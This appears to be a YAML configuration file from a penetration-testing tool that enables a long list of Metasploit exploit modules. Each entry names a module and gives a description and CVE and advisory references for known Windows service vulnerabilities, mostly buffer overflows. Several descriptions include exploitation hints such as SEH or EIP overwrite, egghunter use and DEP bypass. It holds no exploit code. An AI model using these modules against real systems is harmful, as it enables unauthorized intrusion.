enable: true
msf: true
msf_key: windows/http/apache_modjk_overflow
name: Apache mod_jk 1.2.20 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis is a stack buffer overflow exploit for mod_jk 1.2.20.\n\
\t\t\t\tShould work on any Win32 OS.\n\
\t\t\t"
authors:
- - CVE
- 2007-0774
- - OSVDB
- "33855"
- - BID
- "22791"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-07-008.html
path: extensions/metasploit/
class: Msf_module
msf_hp_nnm_toolbar_02:
enable: true
msf: true
msf_key: windows/http/hp_nnm_toolbar_02
name: HP OpenView Network Node Manager Toolbar.exe CGI Cookie Handling Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.0\n\
\t\t\t\tand 7.53. By sending a CGI request with a specially OvOSLocale cookie to Toolbar.exe, an\n\
\t\t\t\tattacker may be able to execute arbitrary code. Please note that this module only works\n\
\t\t\t\tagainst a specific build (ie. NNM 7.53_01195)\n\
\t\t\t"
authors:
- - CVE
- 2009-0920
- - OSVDB
- "53242"
- - BID
- "34294"
- - URL
- http://www.coresecurity.com/content/openview-buffer-overflows
path: extensions/metasploit/
class: Msf_module
msf_oracle9i_xdb_pass:
enable: true
msf: true
msf_key: windows/http/oracle9i_xdb_pass
name: Oracle 9i XDB HTTP PASS Overflow (win32)
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the authorization\n\
\t\t\t\tcode of the Oracle 9i HTTP XDB service. David Litchfield,\n\
\t\t\t\thas illustrated multiple vulnerabilities in the Oracle\n\
\t\t\t\t9i XML Database (XDB), during a seminar on \"Variations\n\
\t\t\t\tin exploit methods between Linux and Windows\" presented\n\
\t\t\t\tat the Blackhat conference.\n\
\t\t\t"
authors:
- - CVE
- 2003-0727
- - OSVDB
- "2449"
- - BID
- "8375"
- - URL
- http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf
path: extensions/metasploit/
class: Msf_module
msf_hp_nnm_nnmrptconfig_schdparams:
enable: true
msf: true
msf_key: windows/http/hp_nnm_nnmrptconfig_schdparams
name: HP OpenView NNM nnmRptConfig.exe schdParams Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits NNM's nnmRptConfig.exe. Similar to other NNM CGI bugs,\n\
\t\t\t\tthe overflow occurs during a ov.sprintf_new() call, which allows an attacker to\n\
\t\t\t\toverwrite data on the stack, and gain arbitrary code execution.\n\
\t\t\t"
authors:
- - CVE
- 2011-0267
- - OSVDB
- "70473"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-11-009/
path: extensions/metasploit/
class: Msf_module
msf_webster_http:
enable: true
msf: true
msf_key: windows/http/webster_http
name: Webster HTTP Server GET Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis exploits a stack buffer overflow in the Webster HTTP server.\n\
\t\t\t\t\tThe server and source code was released within an article from\n\
\t\t\t\t\tthe Microsoft Systems Journal in February 1996 titled \"Write a\n\
\t\t\t\t\tSimple HTTP-based Server Using MFC and Windows Sockets\".\n\
\t\t\t"
authors:
- - CVE
- 2002-2268
- - OSVDB
- "44106"
- - BID
- "6289"
- - URL
- http://www.microsoft.com/msj/archive/s25f.aspx
- - URL
- http://www.netdave.com/webster/webster.htm
path: extensions/metasploit/
class: Msf_module
msf_httpdx_handlepeer:
enable: true
msf: true
msf_key: windows/http/httpdx_handlepeer
name: HTTPDX h_handlepeer() Function Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow vulnerability in HTTPDX HTTP server 1.4. The\n\
\t\t\t\tvulnerability is caused due to a boundary error within the \"h_handlepeer()\" function in http.cpp.\n\
\t\t\t\tBy sending an overly long HTTP request, an attacker can overrun a buffer and execute arbitrary code.\n\
\t\t\t"
authors:
- - OSVDB
- "58714"
- - CVE
- 2009-3711
- - URL
- http://www.pank4j.com/exploits/httpdxb0f.php
- - URL
- http://www.rec-sec.com/2009/10/16/httpdx-buffer-overflow-exploit/
path: extensions/metasploit/
class: Msf_module
msf_hp_nnm_getnnmdata_maxage:
enable: true
msf: true
msf_key: windows/http/hp_nnm_getnnmdata_maxage
name: HP OpenView Network Node Manager getnnmdata.exe (MaxAge) CGI Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53.\n\
\t\t\t\tBy sending specially crafted MaxAge parameter to the getnnmdata.exe CGI,\n\
\t\t\t\tan attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2010-1553
- - OSVDB
- "64976"
path: extensions/metasploit/
class: Msf_module
msf_hp_openview_insight_backdoor:
enable: true
msf: true
msf_key: windows/http/hp_openview_insight_backdoor
name: HP OpenView Performance Insight Server Backdoor Account Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a hidden account in the com.trinagy.security.XMLUserManager Java\n\
\t\t\t\tclass. When using this account, an attacker can abuse the \n\
\t\t\t\tcom.trinagy.servlet.HelpManagerServlet class and write arbitary files to the system \n\
\t\t\t\tallowing the execution of arbitary code.\n\n\
\t\t\t\tNOTE: This module has only been tested against HP OpenView Performance Insight Server 5.41.0\n\
\t\t\t"
authors:
- - CVE
- 2011-0276
- - OSVDB
- "70754"
path: extensions/metasploit/
class: Msf_module
msf_bea_weblogic_transfer_encoding:
enable: true
msf: true
msf_key: windows/http/bea_weblogic_transfer_encoding
name: BEA Weblogic Transfer-Encoding Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack based buffer overflow in the BEA\n\
\t\t\t\tWeblogic Apache plugin. This vulnerability exists in the\n\
\t\t\t\terror reporting for unknown Transfer-Encoding headers.\n\
\t\t\t\tYou may have to run this twice due to timing issues with handlers.\n\
\t\t\t"
authors:
- - CVE
- 2008-4008
- - OSVDB
- "49283"
- - URL
- http://support.bea.com/application_content/product_portlets/securityadvisories/2806.html
path: extensions/metasploit/
class: Msf_module
msf_icecast_header:
enable: true
msf: true
msf_key: windows/http/icecast_header
name: Icecast (<= 2.0.1) Header Overwrite (win32)
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in the header parsing\n\
\t\t\t\tof icecast, discovered by Luigi Auriemma. Sending 32 HTTP\n\
\t\t\t\theaders will cause a write one past the end of a pointer\n\
\t\t\t\tarray. On win32 this happens to overwrite the saved\n\
\t\t\t\tinstruction pointer, and on linux (depending on compiler,\n\
\t\t\t\tetc) this seems to generally overwrite nothing crucial (read\n\
\t\t\t\tnot exploitable).\n\n\
\t\t\t\t!! This exploit uses ExitThread(), this will leave icecast\n\
\t\t\t\tthinking the thread is still in use, and the thread counter\n\
\t\t\t\twon't be decremented. This means for each time your payload\n\
\t\t\t\texits, the counter will be left incremented, and eventually\n\
\t\t\t\tthe threadpool limit will be maxed. So you can multihit,\n\
\t\t\t\tbut only till you fill the threadpool.\n\n\
\t\t\t"
authors:
- - CVE
- 2004-1561
- - OSVDB
- "10406"
- - BID
- "11271"
- - URL
- http://archives.neohapsis.com/archives/bugtraq/2004-09/0366.html
path: extensions/metasploit/
class: Msf_module
msf_amlibweb_webquerydll_app:
enable: true
msf: true
msf_key: windows/http/amlibweb_webquerydll_app
name: Amlibweb NetOpacs webquery.dll Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Amlib's Amlibweb\n\
\t\t\t\tLibrary Management System (NetOpacs). The webquery.dll\n\
\t\t\t\tAPI is available through IIS requests. By specifying\n\
\t\t\t\tan overly long string to the 'app' parameter, SeH can be\n\
\t\t\t\treliably overwritten allowing for arbitrary remote code execution.\n\
\t\t\t\tIn addition, it is possible to overwrite EIP by specifying\n\
\t\t\t\tan arbitrary parameter name with an '=' terminator.\n\
\t\t\t"
authors:
- - OSVDB
- "66814"
- - URL
- http://www.aushack.com/advisories/
path: extensions/metasploit/
class: Msf_module
msf_hp_nnm_toolbar_01:
enable: true
msf: true
msf_key: windows/http/hp_nnm_toolbar_01
name: HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.\n\
\t\t\t\tBy sending a specially crafted CGI request to Toolbar.exe, an attacker may be able to execute\n\
\t\t\t\tarbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2008-0067
- - OSVDB
- "53222"
- - BID
- "33147"
path: extensions/metasploit/
class: Msf_module
msf_edirectory_imonitor:
enable: true
msf: true
msf_key: windows/http/edirectory_imonitor
name: eDirectory 8.7.3 iMonitor Remote Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in eDirectory 8.7.3\n\
\t\t\t\tiMonitor service. This vulnerability was discovered by Peter\n\
\t\t\t\tWinter-Smith of NGSSoftware.\n\n\
\t\t\t\tNOTE: repeated exploitation attempts may cause eDirectory to crash. It does\n\
\t\t\t\tnot restart automatically in a default installation.\n\
\t\t\t"
authors:
- - CVE
- 2005-2551
- - OSVDB
- "18703"
- - BID
- "14548"
path: extensions/metasploit/
class: Msf_module
msf_altn_webadmin:
enable: true
msf: true
msf_key: windows/http/altn_webadmin
name: Alt-N WebAdmin USER Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tAlt-N WebAdmin is prone to a buffer overflow condition. This\n\
\t\t\t\tis due to insufficient bounds checking on the USER\n\
\t\t\t\tparameter. Successful exploitation could result in code\n\
\t\t\t\texecution with SYSTEM level privileges.\n\
\t\t\t"
authors:
- - CVE
- 2003-0471
- - OSVDB
- "2207"
- - BID
- "8024"
- - NSS
- "11771"
path: extensions/metasploit/
class: Msf_module
msf_bea_weblogic_jsessionid:
enable: true
msf: true
msf_key: windows/http/bea_weblogic_jsessionid
name: BEA WebLogic JSESSIONID Cookie Value Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in BEA\\'s WebLogic plugin. The vulnerable\n\
\t\t\t\tcode is only accessible when clustering is configured. A request containing a\n\
\t\t\t\tlong JSESSION cookie value can lead to arbirtary code execution.\n\
\t\t\t"
authors:
- - CVE
- 2008-5457
- - OSVDB
- "51311"
path: extensions/metasploit/
class: Msf_module
msf_mcafee_epolicy_source:
enable: true
msf: true
msf_key: windows/http/mcafee_epolicy_source
name: McAfee ePolicy Orchestrator / ProtectionPilot Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis is an exploit for the McAfee HTTP Server (NAISERV.exe).\n\
\t\t\t\tMcAfee ePolicy Orchestrator 2.5.1 <= 3.5.0 and ProtectionPilot 1.1.0 are\n\
\t\t\t\tknown to be vulnerable. By sending a large 'Source' header, the stack can\n\
\t\t\t\tbe overwritten. This module is based on the exploit by xbxice and muts.\n\
\t\t\t\tDue to size constraints, this module uses the Egghunter technique.\n\
\t\t\t"
authors:
- - CVE
- 2006-5156
- - OSVDB
- "29421 "
- - URL
- http://www.milw0rm.com/exploits/2467
- - URL
- http://www.remote-exploit.org/advisories/mcafee-epo.pdf
- - BID
- "20288"
path: extensions/metasploit/
class: Msf_module
msf_hp_nnm_ovwebsnmpsrv_ovutil:
enable: true
msf: true
msf_key: windows/http/hp_nnm_ovwebsnmpsrv_ovutil
name: HP OpenView Network Node Manager ovwebsnmpsrv.exe ovutil Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n\
\t\t\t\tprior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe'\n\
\t\t\t\tCGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code.\n\n\
\t\t\t\tThis vulnerability is triggerable via either a GET or POST request. It is interesting to\n\
\t\t\t\tnote that this vulnerability cannot be exploited by overwriting SEH, since attempting\n\
\t\t\t\tto would trigger CVE-2010-1964.\n\n\
\t\t\t\tThe vulnerable code is within a sub-function called from \"main\" within \"ovwebsnmpsrv.exe\"\n\
\t\t\t\twith a timestamp prior to April 7th, 2010. This function contains a 256 byte stack buffer\n\
\t\t\t\twhich is passed to the \"getProxiedStorageAddress\" function within ovutil.dll. When\n\
\t\t\t\tprocessing the address results in an error, the buffer is overflowed in a call to sprintf_new.\n\
\t\t\t\tThere are no stack cookies present, so exploitation is easily achieved by overwriting the\n\
\t\t\t\tsaved return address.\n\n\
\t\t\t\tThere exists some unreliability when running this exploit. It is not completely clear why\n\
\t\t\t\tat this time, but may be related to OVWDB or session management. Also, on some attempts\n\
\t\t\t\tOV NNM may report invalid characters in the URL. It is not clear what is causing this\n\
\t\t\t\teither.\n\
\t\t\t"
authors:
- - CVE
- 2010-1961
- - OSVDB
- "65428"
- - BID
- "40638"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-10-106/
- - URL
- http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02217439
path: extensions/metasploit/
class: Msf_module
msf_intersystems_cache:
enable: true
msf: true
msf_key: windows/http/intersystems_cache
name: InterSystems Cache UtilConfigHome.csp Argument Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in InterSystems Cache 2009.1.\n\
\t\t\t\tBy sending a specially crafted GET request, an attacker may be able to execute\n\
\t\t\t\tarbitrary code.\n\
\t\t\t"
authors:
- - OSVDB
- "60549"
- - BID
- "37177"
path: extensions/metasploit/
class: Msf_module
msf_integard_password_bof:
enable: true
msf: true
msf_key: windows/http/integard_password_bof
name: Race River Integard Home/Pro LoginAdmin Password Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\t\tThis module exploits a stack buffer overflow in Race river's Integard Home/Pro\n\
\t\t\t\t\tinternet content filter HTTP Server. Versions prior to 2.0.0.9037 and 2.2.0.9037 are\n\
\t\t\t\t\tvulnerable.\n\n\
\t\t\t\t\tThe administration web page on port 18881 is vulnerable to a remote buffer overflow\n\
\t\t\t\t\tattack. By sending an long character string in the password field, both the structured\n\
\t\t\t\t\texception handler and the saved extended instruction pointer are over written, allowing\n\
\t\t\t\t\tan attacker to gain control of the application and the underlying operating system\n\
\t\t\t\t\tremotely.\n\n\
\t\t\t\t\tThe administration website service runs with SYSTEM privileges, and automatically\n\
\t\t\t\t\trestarts when it crashes.\n\
\t\t\t"
authors:
- - OSVDB
- "67909"
- - URL
- http://www.corelan.be:8800/advisories.php?id=CORELAN-10-061
path: extensions/metasploit/
class: Msf_module
msf_hp_nnm_getnnmdata_hostname:
enable: true
msf: true
msf_key: windows/http/hp_nnm_getnnmdata_hostname
name: HP OpenView Network Node Manager getnnmdata.exe (Hostname) CGI Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53.\n\
\t\t\t\tBy sending specially crafted Hostname parameter to the getnnmdata.exe CGI,\n\
\t\t\t\tan attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2010-1555
- - OSVDB
- "64976"
path: extensions/metasploit/
class: Msf_module
msf_nowsms:
enable: true
msf: true
msf_key: windows/http/nowsms
name: Now SMS/MMS Gateway Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Now SMS/MMS Gateway v2007.06.27.\n\
\t\t\t\tBy sending a specially crafted GET request, an attacker may be able to execute\n\
\t\t\t\tarbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2008-0871
- - OSVDB
- "42953"
- - BID
- "27896"
path: extensions/metasploit/
class: Msf_module
msf_sambar6_search_results:
enable: true
msf: true
msf_key: windows/http/sambar6_search_results
name: Sambar 6 Search Results Buffer Overflow
category: Metasploit
description: "\n\
\t\t\tThis module exploits a buffer overflow found in the\n\
\t\t\t/search/results.stm application that comes with Sambar 6.\n\
\t\t\tThis code is a direct port of Andrew Griffiths's SMUDGE\n\
\t\t\texploit, the only changes made were to the nops and payload.\n\
\t\t\tThis exploit causes the service to die, whether you provided\n\
\t\t\tthe correct target or not.\n\
\t\t\t"
authors:
- - CVE
- 2004-2086
- - OSVDB
- "5786"
- - BID
- "9607"
path: extensions/metasploit/
class: Msf_module
msf_kolibri_http:
enable: true
msf: true
msf_key: windows/http/kolibri_http
name: Kolibri <= v2.0 HTTP Server HEAD Buffer Overflow
category: Metasploit
description: This exploits a stack buffer overflow in version 2 of the Kolibri HTTP server.
authors:
- - CVE
- 2002-2268
- - OSVDB
- "70808"
- - BID
- "6289"
- - URL
- http://www.exploit-db.com/exploits/15834/
path: extensions/metasploit/
class: Msf_module
msf_ca_igateway_debug:
enable: true
msf: true
msf_key: windows/http/ca_igateway_debug
name: CA iTechnology iGateway Debug Mode Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in the Computer Associates\n\
\t\t\t\tiTechnology iGateway component. When <Debug>True</Debug> is enabled\n\
\t\t\t\tin igateway.conf (non-default), it is possible to overwrite the stack\n\
\t\t\t\tand execute code remotely. This module works best with Ordinal payloads.\n\
\t\t\t"
authors:
- - CVE
- 2005-3190
- - OSVDB
- "19920"
- - URL
- http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=33485
- - URL
- http://www.milw0rm.com/exploits/1243
- - BID
- "15025"
path: extensions/metasploit/
class: Msf_module
msf_shttpd_post:
enable: true
msf: true
msf_key: windows/http/shttpd_post
name: SHTTPD <= 1.34 URI-Encoded POST Request Overflow (win32)
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in SHTTPD <= 1.34.\n\
\t\t\t\tThe vulnerability is caused due to a boundary error within the\n\
\t\t\t\thandling of POST requests. Based on an original exploit by skOd\n\
\t\t\t\tbut using a different method found by hdm.\n\
\t\t\t"
authors:
- - CVE
- 2006-5216
- - OSVDB
- "29565"
- - URL
- http://shttpd.sourceforge.net
- - BID
- "20393"
path: extensions/metasploit/
class: Msf_module
msf_badblue_passthru:
enable: true
msf: true
msf_key: windows/http/badblue_passthru
name: BadBlue 2.72b PassThru Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the PassThru\n\
\t\t\t\tfunctionality in ext.dll in BadBlue 2.72b and earlier.\n\
\t\t\t"
authors:
- - CVE
- 2007-6377
- - OSVDB
- "42416"
- - BID
- "26803"
path: extensions/metasploit/
class: Msf_module
msf_hp_nnm_nnmrptconfig_nameparams:
enable: true
msf: true
msf_key: windows/http/hp_nnm_nnmrptconfig_nameparams
name: HP OpenView NNM nnmRptConfig nameParams Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a vulnerability in HP NNM's nnmRptConfig.exe.\n\
\t\t\t\tA remote user can send a long string data to the nameParams parameter via\n\
\t\t\t\ta POST request, which causes an overflow on the stack when function\n\
\t\t\t\tov.sprintf_new() is used, and gain arbitrary code execution.'\n\
\t\t\t"
authors:
- - CVE
- 2011-0266
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-11-008/
path: extensions/metasploit/
class: Msf_module
msf_edirectory_host:
enable: true
msf: true
msf_key: windows/http/edirectory_host
name: Novell eDirectory NDS Server Host Header Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Novell eDirectory 8.8.1.\n\
\t\t\t\tThe web interface does not validate the length of the\n\
\t\t\t\tHTTP Host header prior to using the value of that header in an\n\
\t\t\t\tHTTP redirect.\n\
\t\t\t"
authors:
- - CVE
- 2006-5478
- - OSVDB
- "29993"
- - BID
- "20655"
path: extensions/metasploit/
class: Msf_module
msf_badblue_ext_overflow:
enable: true
msf: true
msf_key: windows/http/badblue_ext_overflow
name: BadBlue 2.5 EXT.dll Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis is a stack buffer overflow exploit for BadBlue version 2.5.\n\
\t\t\t"
authors:
- - CVE
- 2005-0595
- - OSVDB
- "14238"
- - BID
- "7387"
path: extensions/metasploit/
class: Msf_module
msf_novell_imanager_upload:
enable: true
msf: true
msf_key: windows/http/novell_imanager_upload
name: Novell iManager getMultiPartParameters Arbitrary File Upload
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a directory traversal vulnerability which\n\
\t\t\t\tallows remote attackers to upload and execute arbitrary code.\n\n\
\t\t\t\tPortalModuleInstallManager\n\
\t\t\t"
authors:
- - OSVDB
- "68320"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-10-190/
- - URL
- http://www.novell.com/support/viewContent.do?externalId=7006515&sliceId=2
path: extensions/metasploit/
class: Msf_module
msf_adobe_robohelper_authbypass:
enable: true
msf: true
msf_key: windows/http/adobe_robohelper_authbypass
name: Adobe RoboHelp Server 8 Arbitrary File Upload and Execute
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an authentication bypass vulnerability which\n\
\t\t\t\tallows remote attackers to upload and execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2009-3068
- - OSVDB
- "57896"
- - URL
- http://www.intevydis.com/blog/?p=69
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-09-066
path: extensions/metasploit/
class: Msf_module
msf_minishare_get_overflow:
enable: true
msf: true
msf_key: windows/http/minishare_get_overflow
name: Minishare 1.4.1 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis is a simple buffer overflow for the minishare web\n\
\t\t\t\tserver. This flaw affects all versions prior to 1.4.2. This\n\
\t\t\t\tis a plain stack buffer overflow that requires a \"jmp esp\" to reach\n\
\t\t\t\tthe payload, making this difficult to target many platforms\n\
\t\t\t\tat once. This module has been successfully tested against\n\
\t\t\t\t1.4.1. Version 1.3.4 and below do not seem to be vulnerable.\n\
\t\t\t"
authors:
- - CVE
- 2004-2271
- - OSVDB
- "11530"
- - BID
- "11620"
- - URL
- http://archives.neohapsis.com/archives/fulldisclosure/2004-11/0208.html
path: extensions/metasploit/
class: Msf_module
msf_hp_nnm_ovalarm_lang:
enable: true
msf: true
msf_key: windows/http/hp_nnm_ovalarm_lang
name: HP OpenView Network Node Manager ovalarm.exe CGI Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53.\n\
\t\t\t\tBy sending a specially crafted CGI request to ovalarm.exe, an attacker can execute\n\
\t\t\t\tarbitrary code.\n\n\
\t\t\t\tThis specific vulnerability is due to a call to \"sprintf_new\" in the \"isWide\"\n\
\t\t\t\tfunction within \"ovalarm.exe\". A stack buffer overflow occurs when processing an\n\
\t\t\t\tHTTP request that contains the following.\n\n\
\t\t\t\t1. An \"Accept-Language\" header longer than 100 bytes\n\
\t\t\t\t2. An \"OVABverbose\" URI variable set to \"on\", \"true\" or \"1\"\n\n\
\t\t\t\tThe vulnerability is related to \"_WebSession::GetWebLocale()\" ..\n\n\
\t\t\t\tNOTE: This exploit has been tested successfully with a reverse_ord_tcp payload.\n\
\t\t\t"
authors:
- - CVE
- 2009-4179
- - OSVDB
- "60930"
- - BID
- "37347"
- - URL
- http://dvlabs.tippingpoint.com/advisory/TPTI-09-12
- - URL
- http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01950877
path: extensions/metasploit/
class: Msf_module
msf_coldfusion_fckeditor:
enable: true
msf: true
msf_key: windows/http/coldfusion_fckeditor
name: ColdFusion 8.0.1 Arbitrary File Upload and Execute
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits the Adobe ColdFusion 8.0.1 FCKeditor 'CurrentFolder' File Upload\n\
\t\t\t\tand Execute vulnerability.\n\
\t\t\t"
authors:
- - CVE
- 2009-2265
- - OSVDB
- "55684"
path: extensions/metasploit/
class: Msf_module
msf_altn_securitygateway:
enable: true
msf: true
msf_key: windows/http/altn_securitygateway
name: Alt-N SecurityGateway username Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tAlt-N SecurityGateway is prone to a buffer overflow condition. This\n\
\t\t\t\tis due to insufficient bounds checking on the \"username\"\n\
\t\t\t\tparameter. Successful exploitation could result in code\n\
\t\t\t\texecution with SYSTEM level privileges.\n\n\
\t\t\t\tNOTE: This service doesn't restart, you'll only get one shot. However,\n\
\t\t\t\tit often survives a successful exploitation attempt.\n\
\t\t\t"
authors:
- - CVE
- 2008-4193
- - OSVDB
- "45854"
- - BID
- "29457"
path: extensions/metasploit/
class: Msf_module
msf_apache_mod_rewrite_ldap:
enable: true
msf: true
msf_key: windows/http/apache_mod_rewrite_ldap
name: Apache module mod_rewrite LDAP protocol Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits the mod_rewrite LDAP protocol scheme handling\n\
\t\t\t\tflaw discovered by Mark Dowd, which produces an off-by-one overflow.\n\
\t\t\t\tApache versions 1.3.29-36, 2.0.47-58, and 2.2.1-2 are vulnerable.\n\
\t\t\t\tThis module requires REWRITEPATH to be set accurately. In addition,\n\
\t\t\t\tthe target must have 'RewriteEngine on' configured, with a specific\n\
\t\t\t\t'RewriteRule' condition enabled to allow for exploitation.\n\n\
\t\t\t\tThe flaw affects multiple platforms, however this module currently\n\
\t\t\t\tonly supports Windows based installations.\n\
\t\t\t"
authors:
- - CVE
- 2006-3747
- - OSVDB
- "27588"
- - BID
- "19204"
- - URL
- http://archives.neohapsis.com/archives/bugtraq/2006-07/0514.html
- - URL
- http://www.milw0rm.com/exploits/3680
- - URL
- http://www.milw0rm.com/exploits/3996
- - URL
- http://www.milw0rm.com/exploits/2237
path: extensions/metasploit/
class: Msf_module
msf_hp_nnm_ovwebhelp:
enable: true
msf: true
msf_key: windows/http/hp_nnm_ovwebhelp
name: HP OpenView Network Node Manager OvWebHelp.exe CGI Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.\n\
\t\t\t\tBy sending a specially crafted CGI request to OvWebHelp.exe, an attacker may be able to execute\n\
\t\t\t\tarbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2009-4178
- - OSVDB
- "60929"
- - BID
- "37340"
path: extensions/metasploit/
class: Msf_module
msf_kerio_auth:
enable: true
msf: true
msf_key: windows/firewall/kerio_auth
name: Kerio Firewall 2.1.4 Authentication Packet Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in Kerio Personal Firewall\n\
\t\t\t\tadministration authentication process. This module has only been tested\n\
\t\t\t\tagainst Kerio Personal Firewall 2 (2.1.4).\n\
\t\t\t"
authors:
- - CVE
- 2003-0220
- - OSVDB
- "6294"
- - BID
- "7180"
- - URL
- http://www1.corest.com/common/showdoc.php?idx=314&idxseccion=10
path: extensions/metasploit/
class: Msf_module
msf_blackice_pam_icq:
enable: true
msf: true
msf_key: windows/firewall/blackice_pam_icq
name: ISS PAM.dll ICQ Parser Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the ISS products that use\n\
\t\t\t\tthe iss-pam1.dll ICQ parser (Blackice/RealSecure). Successful exploitation\n\
\t\t\t\twill result in arbitrary code execution as LocalSystem. This exploit\n\
\t\t\t\tonly requires 1 UDP packet, which can be both spoofed and sent to a broadcast\n\
\t\t\t\taddress.\n\n\
\t\t\t\tThe ISS exception handler will recover the process after each overflow, giving\n\
\t\t\t\tus the ability to bruteforce the service and exploit it multiple times.\n\
\t\t\t"
authors:
- - CVE
- 2004-0362
- - OSVDB
- "4355"
- - URL
- http://www.eeye.com/html/Research/Advisories/AD20040318.html
- - URL
- http://xforce.iss.net/xforce/alerts/id/166
path: extensions/metasploit/
class: Msf_module
msf_energizer_duo_payload:
enable: true
msf: true
msf_key: windows/backdoor/energizer_duo_payload
name: Energizer DUO Trojan Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module will execute an arbitrary payload against\n\
\t\t\t\tany system infected with the Arugizer trojan horse. This\n\
\t\t\t\tbackdoor was shipped with the software package accompanying\n\
\t\t\t\tthe Energizer Duo USB battery charger.\n\
\t\t\t"
authors:
- - CVE
- 2010-0103
- - OSVDB
- "62782"
- - US-CERT-VU
- "154421"
path: extensions/metasploit/
class: Msf_module
msf_ms07_029_msdns_zonename:
enable: true
msf: true
msf_key: windows/smb/ms07_029_msdns_zonename
name: Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the RPC interface\n\
\t\t\t\tof the Microsoft DNS service. The vulnerability is triggered\n\
\t\t\t\twhen a long zone name parameter is supplied that contains\n\
\t\t\t\tescaped octal strings. This module is capable of bypassing NX/DEP\n\
\t\t\t\tprotection on Windows 2003 SP1/SP2. This module exploits the\n\
\t\t\t\tRPC service using the \\DNSSERVER pipe available via SMB. This\n\
\t\t\t\tpipe requires a valid user account to access, so the SMBUSER\n\
\t\t\t\tand SMBPASS options must be specified.\n\
\t\t\t"
authors:
- - CVE
- 2007-1748
- - OSVDB
- "34100"
- - MSB
- MS07-029
- - URL
- http://www.microsoft.com/technet/security/advisory/935964.mspx
path: extensions/metasploit/
class: Msf_module
msf_ms05_017_msmq:
enable: true
msf: true
msf_key: windows/dcerpc/ms05_017_msmq
name: Microsoft Message Queueing Service Path Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in the RPC interface\n\
\t\t\t\tto the Microsoft Message Queueing service. The offset to the\n\
\t\t\t\treturn address changes based on the length of the system\n\
\t\t\t\thostname, so this must be provided via the 'HNAME' option.\n\
\t\t\t\tMuch thanks to snort.org and Jean-Baptiste Marchand's\n\
\t\t\t\texcellent MSRPC website.\n\n\
\t\t\t"
authors:
- - CVE
- 2005-0059
- - OSVDB
- "15458"
- - MSB
- MS05-017
- - BID
- "13112"
